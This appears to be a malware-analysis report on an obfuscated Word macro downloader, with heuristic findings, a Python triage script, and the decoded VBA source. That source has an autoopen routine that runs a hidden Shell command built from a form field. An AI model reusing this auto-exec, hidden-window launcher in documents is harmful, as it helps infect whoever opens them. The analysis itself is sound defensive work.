Verdict: MALICIOUS (risk score 252)

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1203 (Exploitation for Client Execution)
The sample is a malicious Microsoft Word document (VB_Base = "1Normal.ThisDocument") carrying an obfuscated VBA project. An `autoopen` procedure runs when the document is opened and calls a single function whose only live statement is `Interaction.Shell(qZvjmYwVJ, WsFklTAWmGH)`; the rest of the module is dead weight: `Select Case` blocks keyed on variables that are never assigned, so no branch is taken, and `Log()` calls whose runtime errors are swallowed by `On Error Resume Next`. The command string is assembled at run time from the contents of the form control `nKutkAsDiRl.TextBox1` plus several unassigned variables, so the actual payload does not appear in the macro source and must be recovered from the document's form data. The second Shell() argument is the module constant `WsFklTAWmGH = 0`, i.e. vbHide, so the spawned process has no visible window. The SC_STR_CMD heuristic indicates that the command invokes cmd.exe with an execution flag, and the ClamAV signature `Doc.Downloader.Valyria-6786378-0` classifies the document as a downloader stage.
Heuristics (9)

- ClamAV: Doc.Downloader.Valyria-6786378-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Valyria-6786378-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched lines in script:
  `Set whzGutQMXKFLwpFj = BirNbDapsKpzou`
  `zIYVUU = Array(irrbNr, dCjHuUG, joNKZtW, Interaction.Shell(qZvjmYwVJ, WsFklTAWmGH), jVPfBGE)`
  `Select Case UvCcVulwUAaJUWRJfK`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched lines in script:
  `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"`
  `Sub autoopen()`
  `PUOGPMYEH`
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the standard DrawingML schema namespace, not a download location)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12007 bytes |

SHA-256: 7aae02c68ab02b2a667a00ecd693392ff15c40e661c0d18136ba0a0991d97506

Detection (macros.bas): ClamAV: No threats found. The Doc.Downloader.Valyria signature above is a document-level detection; the decoded macro source on its own is not flagged.

Obfuscation or payload: likely. 327 of 371 identifiers look randomly generated (e.g. 'AMnCMqBocGPtLTLzdWotDMLP'), consistent with name-mangling obfuscation.
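The three findings that matter here (an auto-exec entry point, a Shell() call whose command is built at run time, and mangled identifier names) can be reproduced on the decoded source without the analyzer. The script below is an added example, not the analyzer's or oletools' own code: it scans a VBA module for auto-exec procedures, locates Shell() calls, traces the command variable back to its assignment, decodes the WindowStyle argument (following `Const` definitions, so `WsFklTAWmGH = 0` resolves to vbHide), and scores identifiers with a simple case-flip/vowel-ratio heuristic. The embedded sample is an excerpt of the macros.bas preview shown in this report, not the full module; the thresholds in `looks_random` and the keyword list are this example's own choices.

```python
"""Static triage of a decoded VBA module: auto-exec entry points, Shell()
calls with their decoded window style, and a random-identifier ratio.
Added example; not the analyzer's heuristics and not oletools code."""
import re
from dataclasses import dataclass
from typing import Optional

# Excerpt of the macros.bas preview from this report (the variables really are
# never assigned in the sample). Not the full 12007-byte module.
SAMPLE_VBA = r'''Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
PUOGPMYEH
End Sub
Function PUOGPMYEH()
On Error Resume Next
Select Case RdTutMtvJQKrSOukE
Case 299900804
XDBqHUGmKcASWjUpHuaRFlrp = osiRAcXCnkMPmLanaiTJwnHz
nqdbulLMrSbXVJAdPjw = Log(ZUiAiiDYfAAkksN)
End Select
Const WsFklTAWmGH = 0
qZvjmYwVJ = nKutkAsDiRl.TextBox1 + TJLnW + zKkdjBw + ZcBXov
zIYVUU = Array(irrbNr, dCjHuUG, joNKZtW, Interaction.Shell(qZvjmYwVJ, WsFklTAWmGH), jVPfBGE)
End Function
'''

# Word/Excel auto-execution procedure names (VBA names are case-insensitive).
AUTOEXEC_NAMES = {"autoopen", "auto_open", "document_open", "autoexec",
                  "autoclose", "auto_close", "workbook_open", "document_close"}
# Shell() WindowStyle values; 0 (vbHide) spawns the child with no visible window.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
# Tokens that are VBA syntax or library names, not author-chosen identifiers
# (assumed list for this example; extend for real modules).
VBA_KEYWORDS = {"attribute", "vb_control", "vb_name", "sub", "function", "end", "on",
                "error", "resume", "next", "select", "case", "const", "set", "log",
                "array", "interaction", "shell", "textbox1", "createobject", "getobject"}

PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
SHELL_RE = re.compile(r"\b(?:VBA\.)?(?:Interaction\.)?Shell\s*\(([^()]*)\)", re.I)
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
STRING_RE = re.compile(r'"[^"]*"')


@dataclass
class ShellCall:
    line_no: int
    command_expr: str              # first argument as written in the source
    command_source: Optional[str]  # what that variable is assigned from, if traceable
    window_style: Optional[str]    # decoded WindowStyle name, None if unresolved


def resolve_int(src: str, token: str) -> Optional[int]:
    """Integer literal, or the value of a module-level `Const token = N`."""
    token = token.strip()
    if re.fullmatch(r"\d+", token):
        return int(token)
    m = re.search(r"\bConst\s+" + re.escape(token) + r"\s*=\s*(\d+)", src, re.I)
    return int(m.group(1)) if m else None


def assignment_of(src: str, name: str) -> Optional[str]:
    """Right-hand side of the first `name = ...` statement, if any."""
    m = re.search(r"^\s*" + re.escape(name) + r"\s*=\s*(.+)$", src, re.I | re.M)
    return m.group(1).strip() if m else None


def find_autoexec(src: str) -> list:
    return [n for n in PROC_RE.findall(src) if n.lower() in AUTOEXEC_NAMES]


def find_shell_calls(src: str) -> list:
    calls = []
    for no, line in enumerate(src.splitlines(), 1):
        for m in SHELL_RE.finditer(line):
            args = [a.strip() for a in m.group(1).split(",")]
            cmd = args[0] if args and args[0] else "<empty>"
            # WindowStyle omitted -> vbMinimizedFocus (2), the VBA default.
            style = resolve_int(src, args[1]) if len(args) > 1 else 2
            source = assignment_of(src, cmd) if re.fullmatch(r"\w+", cmd) else None
            calls.append(ShellCall(no, cmd, source, WINDOW_STYLES.get(style)))
    return calls


def looks_random(ident: str) -> bool:
    """Name-mangling heuristic: frequent case flips or almost no vowels.
    Short names are skipped; ordinary English identifiers stay below both cut-offs."""
    letters = [c for c in ident if c.isalpha()]
    if len(letters) < 5:
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    vowels = sum(c in "aeiouAEIOU" for c in letters)
    return flips / (len(letters) - 1) >= 0.3 or vowels / len(letters) < 0.2


def identifier_stats(src: str):
    """(random_count, total_count, flagged_names) over author-chosen identifiers,
    deduplicated case-insensitively and with string literal contents ignored."""
    code = STRING_RE.sub('""', src)
    seen = {}
    for ident in IDENT_RE.findall(code):
        if ident.lower() not in VBA_KEYWORDS:
            seen.setdefault(ident.lower(), ident)
    flagged = sorted(v for v in seen.values() if looks_random(v))
    return len(flagged), len(seen), flagged


def triage(src: str) -> dict:
    random_n, total_n, _ = identifier_stats(src)
    shells = find_shell_calls(src)
    return {
        "autoexec": find_autoexec(src),
        "shell_calls": shells,
        "hidden_window": any(c.window_style == "vbHide" for c in shells),
        "random_identifier_ratio": round(random_n / total_n, 2) if total_n else 0.0,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    print("auto-exec procedures:", report["autoexec"])
    for c in report["shell_calls"]:
        print(f"line {c.line_no}: Shell({c.command_expr}) window={c.window_style}")
        print("  command built from:", c.command_source)
    print("random identifier ratio:", report["random_identifier_ratio"])
```

On the excerpt this reports `autoopen` as the entry point, one Shell() call on line 14 with window style vbHide, and a command expression traced to `nKutkAsDiRl.TextBox1 + ...`, which tells the analyst that the payload lives in the form control rather than in the macro text. The identifier heuristic flags 15 of 18 names; on the full module the analyzer's own measure gave 327 of 371.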
Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "nKutkAsDiRl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
PUOGPMYEH
End Sub
Attribute VB_Name = "jFLspwZVzOFpw"
Function PUOGPMYEH()
On Error Resume Next
Select Case RdTutMtvJQKrSOukE
Case 299900804
XDBqHUGmKcASWjUpHuaRFlrp = osiRAcXCnkMPmLanaiTJwnHz
nqdbulLMrSbXVJAdPjw = Log(ZUiAiiDYfAAkksN)
tbtwADvswPFYTjiEJpzTHd = 326357724
injqSqncwNjoqzIWZ = BOYfFzRwbvsuiPddQNWEaH
Case 189123834
bFwuOJjdtRbjqDhhYWPr = 238608210
iULMjvzVPtlwDA = Log(XhSOPANnumMfpf)
slsZWcjBZliYBh = 325429029
AhiBowcUBVjQZXPJqLBADdd = Log(ofsdlcLGwsMzKdPvJXX)
End Select
Set wScCWUiqjzqWEE = IEzjZJaThLRwMvFr
Select Case UjVYsuoOhrHkIX
Case 62252542
CvXZztqZRfbCiRWSCViNVjcb = LYTIqSSvNpWHQAa
vGMTmkPUpimtviWSwRnUWR = Log(NIGQczLmUEXZZQHVbJz)
IfZziTDLwNFUifzLfU = 253952034
dwRpYFwCowMKXwShjG = JvAnHwCvuQwpHXipLNjbd
Case 148568683
WBAuzjNRbYmdYd = 56983193
qVJClsHFnsIGTzfD = Log(udmGDFOjzUQUuFLCDsFTUP)
uvHEXGzctiqiAWDnPvVm = 157061455
ktnzDQGZkSizsLwBqaBrXmD = Log(LjzFpYwdGDKNRaChWTw)
End Select
Set zBdsrOEukjTwpLlWQB = LTAspBikQYUVDojbKDHOb
Select Case vBfMCBiXfHHmMuwzZMNCmcfn
Case 238625836
RihpOpoIYAlVIHjiamGBfC = oXKbBLTWsbPjDpqtR
EVwMEDFTECtjiIOLtREOnwFi = Log(ttYfsjtpEahUcTHWiHRdLtH)
rvZoDKIQTTKJhnLSAr = 196120372
hrRzwsEooBhzlDnwKEluS = AIIzovwwcTPamAibr
Case 74666859
TbSmLXizOIwGjOQ = 279193178
pzDJspYNjLQnSiM = Log(owphWzZKvhpjNjLVKWm)
HvbluYbMNMwakjvPbIlratO = 70427922
rzDAudvwTSsXDn = Log(WNwjlPwhlvtBluSOhQlCYXLS)
End Select
Set AdQNCsYVnUMwfZkvSSEAb = BBEKHRkZzBiAllfT
Select Case izLXVjjdwZrUzfHouJmNvk
Case 143208823
XOjsTDaNELHiljh = wzPWHBSwvdpHzlqwdCzHCrKt
dPmYYCKcqRwVzBWvkzpNSPTU = Log(EjkatEnWWilfXWb)
fHTsdiBdLRuUfjNwRQUT = 176317462
zNKzcWkQNaOinI = ciahGPbKSqpQpOHCHEdJGhiB
Case 201617925
uETGztFzolulUmWCsImGuBG = 161186773
iJzsuAYDNUXrMtw = Log(rZVIVjqnDpVOYwsw)
zSkGEukViGSwLfPqvDckQlu = 122977149
oFiJiObZwNaLFnfl = Log(mcYosJGXdvQNiNXRtPoGLE)
End Select
Set qZOSofqQzzdzRtXwwXmBTLL = zCuLXqibikiPiqRsm
Select Case iQQTAQoLvpjGzci
Case 33986503
iXdnlqdPdGWXziTsAvmkiQ = AwwDMGVhtsQENjRsZ
DWKRowGNNzhwUIRHcpnnRJ = Log(YciidFMjDMzatFi)
CwzsWAzXInGDcFm = 139047492
PmpKNdHBPijXhXBujkqSRlX = HaqzJGzacjiTtzpTrrGW
Case 94044765
aQFIwUvDcdOJCmmIrJjJuBsi = 10648029
vXaaiBQHzauBKdiZDAEj = Log(CjjzzpFFZXXGPYYcCwNtvmMO)
zDiVwrdSktqqahLLCaDXuu = 28209339
wABrqAPUVJzmajb = Log(toifilcRBhtMJrvEzYYz)
End Select
Set lcjdVVRjZlSzXdGPYXKYkq = HDLdNtmBLdpIMvC
Select Case QTCOVMLIiavorqiCwzMd
Case 80516729
wIjHaErjLLidCmm = JOjuStGolLjOHzTDRGWuiNmG
BOjFOowQCqzwRqCBs = Log(OYcZOsiLvPrNvbadQf)
iWXkwEHVHAPUsprXip = 188060004
rbCsjYpuVWoaXf = zrodUGWXLfvzXEEr
Case 264138395
ifHUiDaONzkLpzNjrjtLIt = 135311566
qNlYSpRfAlszCi = Log(kCFtXnzpzlqMXzcj)
KDiQSBwXhFLEENdMTJJCz = 324922387
qYnnccuhXFHozAvSA = Log(WpholtXMzEoTdlN)
End Select
Set nsiOTunYowzZiMXqItdHjC = uPPcqsEcVbNNDnmpbCJAmv
Const WsFklTAWmGH = 0
Select Case TABYsHoaPmEEWbtkEBfvSV
Case 282814915
uvLUAjmLKYSjtLFaFwoFs = qiRKvKRTXzKSdww
ZjzttwJMqsvFqThkqp = Log(jDpkctqAUWbhIdk)
EGzLsVEUCOLdEPZbnsP = 113207431
wXzCzoqPLnbFtcirdMLzV = NiNwEzztQNTpGiAIujNEr
Case 183600922
XKmukKfESORKRpBktPRWO = 252227550
WwrURflQqlzplR = Log(PjkJBbpYiTtwUp)
FWlGQzspOZjzaYTzQSp = 341125017
lEldhXIBXiQbPjbEfBFXt = Log(jUdOzPUdiiptTRAciZ)
End Select
Set oqqQVLsrukQkcnPVQzTYs = uElmWMKECTfmFftEICHY
Select Case NtOmhWTmpULJGWCqHzMs
Case 60546054
vUjzQQjHSmYBiNLp = YFsonjfPLGGvOYo
AwuDhGDFiBZkFrpfRo = Log(nRYHoDjEKaLDNkhiPRlbRC)
GmHuKTRadakACbqGzzCsfW = 327868152
AYMaOjNWliSVjJZk = ziddjiDYLmdPJGjovtmHqMz
Case 88945647
PXJUZqYRAfoUiRtJ = 9950951
tjGbXihlPndBml = Log(QTHuEmwEzJbvTMctz)
JDdHnzamnblowsDESwlPwR = 323331063
ISwnNZmujMdhlIfHTRwV = Log(JLisOuiHhssGwwVDmY)
End Select
Set orIlPWTJSdviSbLz = NvziImwTkanKKEh
Select Case BzEkNsTcBYHqpMTr
Case 26145507
vUDpTMBjGuikbfmaiJRwHBB = JVFMZANzVWbjIMdrjjmYtQz
EOiJZHmuSJfzHoHGhiP = Log(ECRWfZNaOdAsYdI)
VDaOkhQwjjkuZjrK = 11697077
XBwIdztLfpJmZdjwkdIAUWl = pzpTBimprjGGNNaaV
Case 164820457
bpuGGNcwOCBXAP = 197591204
iKaKwDTusXaiWDifvU = Log(cusiFYmYnpJFqjuv)
uOFXWzOjntZLUVbjF = 7182837
lbUlKfjFiSjzbHRkjPm = Log(uizSiNMTUiYkiWK)
End Select
Set adusqufQDuwDCluQTuiGbC = wSNkAtwQFzcKDUt
Select Case vkzTmRCpcZraCEtluwn
Case 46668250
XzpNnRqCaMBZObmWBlUvvua = TkEinXZVkhXmJF
AMnCMqBocGPtLTLzdWotDMLP = Log(nfojEzMvmTiIsO)
SwbXXiNBYktQVLvo = 7247789
zYKMHYGDzYAdolIdbGk = rYaiPvKjrjrfhkspAFoDRT
Case 216903388
BvvIHskoDNfbwjzLOWMNhU = 316821468
sScVShWXrlcUAC = Log(wzCcTERrTIcouHTHjzr)
pPPWVrHkNEdLMuNOf = 295779584
zabJNptbQYdwUJlmjjj = Log(cwhdPiRczuEcnWr)
End Select
Set OGBjcPrLjHICaIiizmzCtz = iXQbVTBIwRwYciziMEVtHWP
qZvjmYwVJ = nKutkAsDiRl.TextBox1 + TJLnW + zKkdjBw + ZcBXov + mzXDm + NkEuY + cAHQOpS + ctkqXNa + dLIMfYH + wDRzK
Select Case HsAjioqfWUHzlkztOtfn
Case 5751678
tEcqlUYOhHzsCPwimmiIk = GhBdDsdEahiZwvG
CWGImAzshjzkHsJswowvoHR = Log(kdjSOcRAXukIBcSGiIwT)
tzhYldKwLDuEbYJTjiFSwMMI = 5311168
UVsNfLwjrjwuczHDMrpDaEJ = BiqAzhkZXuJoEzXjGrjdVm
Case 15652114
LszVSwRQMGLBUzk = 66175017
ZWhpSzOTGziXfQPbkpHhOGac = Log(cwmWOIGWhwPUQttkCMzitjp)
ZkHdchSwFwpAcwspcAzUAHUw = 91790445
MubtzwIqzdAduAdSOTDsIFTK = Log(tjVvRPLPfVYVLzt)
End Select
Set lzOowFwqhsBsVoGaRnGMnvf = pOOfFzDWKzWGEVIn
Select Case YiCwRFwGMsDdivIih
Case 304190655
WMWwwiPaCOszhVXjt = kjblLuADLzrLctadfEBf
SCfwsTsWHKLPDz = Log(mkAczuTQjqlzZEpT)
NbRjwoSbIhDofvZwPquDZ = 221249180
zlvGHUSRRqdCbfi = viBpNPbDuMCKNvPHfSSvAi
Case 74302820
pPlzBtzQlAwVYsv = 235997150
sLuRIEWbVWJNipNX = Log(zzddCAOmYNwujnWikIXQpjL)
WfXoCCKlwiswFjpKj = 201372395
qahmimiwhpGETmPHWdZjW = Log(KvEvYcESMkLzUo)
End Select
Set tpCXEdvraYLqZThGuMoPli = OCtOdWtVRaSdoXMSYOEiWM
Select Case OSlkqIJwizTRVX
Case 65074773
uhpRYWHmlEuAUbDRKPtXH = slFEwFwkvrEMzvwScrLzwlNI
HuCHFimivpDMUYBpBJD = Log(IcHVsmBMIAGYzdrLtcpNSiDG)
GITJJwcKMSinhPSdaWuifOq = 216027770
wYUpiaYBclihCwDiNlKMYMN = jrLJXMrRnSNYIUisFl
Case 30928851
owXXrERdjTSjLzGmOPiQ = 304012963
ujkfWtDSHmHjinTo = Log(SuNkTAdNKOvdpHojb)
nnLiYaOMjcbOSS = 174530370
LVjcajGRLfHoSiTAHljAGkWn = Log(GUBmvvdDrwSDzbEjtW)
End Select
Set TauBJaHhmZrbwsFUPFfPjil = iAzHJbTMNdUwMSsLoOq
Select Case mDWYwVtdjjkXaOcItXGz
Case 59822234
CcOUAirLzEblNRYG = EOEXPmzwBiklIXzXYB
JbUPmYjjwoAKjmACiEpmpRX = Log(zGZrhdOoQdzujwRzfGAHAUAw)
UOSiOEsEVQfwswS = 175556456
uFpFSjnqHjQPwfFb = MOwFBZFqNilAnHhhoZuJC
Case 13558138
isHVboXlaWImEiGsjjOF = 8142362
pUbiiJFKRhKjRN = Log(DdBpzLdiUdCihNZnwddCmts)
OfPFbcUNszdFNPD = 277253602
pGFfaXwruNFnLIJl = Log(bRvYDsIpqkkTahanqwnnbnI)
End Select
Set NhOPZhpUUSomunmOw = knMXTjfAULWzToJdLWdtPJ
Select Case cfOfsVzivaVUtwOrOWE
Case 292409784
LXcHUKzZszQKtoAmkkCwwiTz = dcPdikTRiRIlXXKAJCbFJ
KNFimCvAcDfXrikvKOwtPXrA = Log(MswmfssadSBYEwRV)
oFGAfbPNsMIQknWERZJz = 93862464
LnwOQiXFQfYlimtMjQjYmfjK = ifTmYHWPruTERLjqmwdswFj
Case 70435842
ttSpJfDlVlDETsX = 13626845
qsaIPEziAjGSuZvIhf = Log(DZiOPSwadmTEFqbOr)
zdoSHJwzTaLHvlMJwzIdL = 274496284
iWwjfAcTKEYkBZkSY = Log(SzWPVrhrvriGOYHLK)
End Select
Set KdQwqHADWBKjNijKsqwPAEwn = koEqAcqPoHvCVIP
Select Case iloXVJuKpvQSbHt
Case 72382575
ctnoJbcJQAvsSwcARQO = tFHpslfbiwEtjfoHJRYKMO
IzRXznRKrfWhWmw = Log(YvAiUvBLmIVqAsEbfBwqaNjo)
mNOJzSULUAOMjkMw = 43272470
qSaKwbuCVnHVKPMRhimBo = AffspPvQmrTcpVmbPnOvzj
Case 23073122
pwASCiMFwARvfGlfGEBQBiZq = 206160242
TwmttTbjDqPdNIf = Log(jpErwICjpsfnwGYJm)
KNSCGzTwCuQcrtknCkmoKKwD = 29489216
oojwSFrQzRwdiG = Log(zFITMAlCJEoXwmARPwF)
End Select
Set iPGcKlawTqZBfQN = okrACmZsdisiwA
Select Case nSmCfOAtztCtLicWhJCcz
Case 123301277
cwjiVmbzaWcrsiTRTOCNQ = vfmCtOOoWlUjJEzjfGYtcX
njnNrjNwFVoCAsStMlmzr = Log(LZPSkjwoWMYwwTFAWF)
pPKVBwqMMLIpYrR = 157313968
wZwizQzbiEuwoMOhq = HBEOTtWkcNWzEh
Case 311226310
CwGipwLtWuwOXztIhqJWKj = 41114102
IPolEizNDzKRbLL = Log(qKsZwIMdUOROXYf)
qAWaKZorujKZobhWi = 5162340
zrhJzDKRqMkpiSsbbolz = Log(WAiNzmoshvkWsjaJq)
End Select
Set XzIziKtfHwAFhtBPdr = vCRWYJRATmlRRk
Select Case jhENjzTPWhhPbjOb
Case 6557549
wJEUKkYGblZRqMPVSn = KkDOKpBhYblqYJtBdHL
UpZXhqFqUzFNbBqlvut = Log(ICzipuAIzLmNGPFULfhU)
LNZVXPWSIGiNhPRpuhmpw = 298324375
MsHLvWaQNZtwpaJS = ippEEAZAofQzuioSDNdQ
Case 26704766
whqVonScPlPHLHEEIrh = 73217117
qJSTuFilMfBbDsH = Log(iLmhLQfhmSjNwElis)
GXXCthnqCFNjIOwqZj = 314463334
wZikjcYQnHuTikmjqjRE = Log(UOZUGKSRHfFmPWjsnVRIWDu)
End Select
Set uzXbNAtOrjbLEQZR = zfcpjTNGqCKAvWR
Select Case AXCYXrBrmjjidpQ
Case 64777967
OKKtrVDpisojAImiqwvHV = pVnSbvhzXmwbcf
MJBwiszNIlXtAnrUCPMVoGYt = Log(HhVBmYjHidotImI)
IijDChJfStMPJKGlIqaLiL = 143840351
rlSJCbtdDfjbsqGa = pjsMQwXXDlSLzLwITM
Case 107974906
zdqAiMiiisRkAnocd = 8284758
nvmzpbRFTjSZdpLXMss = Log(EUstKTiLJXUfRmcTNiBY)
GKvLTnupQcjkXVTCs = 264173265
tFwwOmHrMrKiqULwJz = Log(rjnWtukvtQJRUpjfLJOjY)
End Select
Set whzGutQMXKFLwpFj = BirNbDapsKpzou
zIYVUU = Array(irrbNr, dCjHuUG, joNKZtW, Interaction.Shell(qZvjmYwVJ, WsFklTAWmGH), jVPfBGE)
Select Case UvCcVulwUAaJUWRJfK
Case 209037556
uOiCDRjahBrtNPCwibG = dKTrvdTdJazTara
NzYDLLPTIhwETVb = Log(DZzkuqHazFQGDX)
VpwijCCuSvAiOhPJo = 336993669
PBtqLWswGFuIPkOaOXmsCBi = ouIsthvcHKIRczkMqDwp
Case 158229270
kzzGAmBGqOWOBRNzFYKSBE = 190790521
wPmZBzEpGBJKsmhJaAUtuNwT = Log(rzXfFlfUCIlzcFqJhHzHDHTr)
rAkjDkQSbKBhKB = 106989382
qqdvKwudjMFzMvjijiOl = Log(lwXUjBvpcXGjdNQpvqsFGzqf)
End Select
Set GfaXAfmfiFrGbdzzo = pwQjiSoloVfolIs
Select Case iRXbGwfmlTlWMoXW
Case 194947398
ISoVPkZfpnodCAlZohiiCEvz = dmJFiHLqMPOWJB
BaHswHRlknAprwwDXrTmzQ = Log(GfdmpkWCfjqcczDzuLB)
RiSTsPMrfqOqlAAMUVb = 9076096
lUIAVUGTsZbwrIYNK = aYiXpSArbwriYkzKjNJSWuF
Case 162206770
QnuusczKbBdkOfqAitJbNA = 283087362
hcLDrXfSFjYiGzjUsUziWaRh = Log(SrBwwZQwzMQRvSDVL)
iHLuhKojsCIZHKdlZjiV = 60449485
HiIkSDzCuNLvnaHY = Log(qHMjNoXFGoKsXqpV)
End Select
Set zdlwrlmqIuOLWCiBVn = wdtukiMPmJXXWaTad
End Function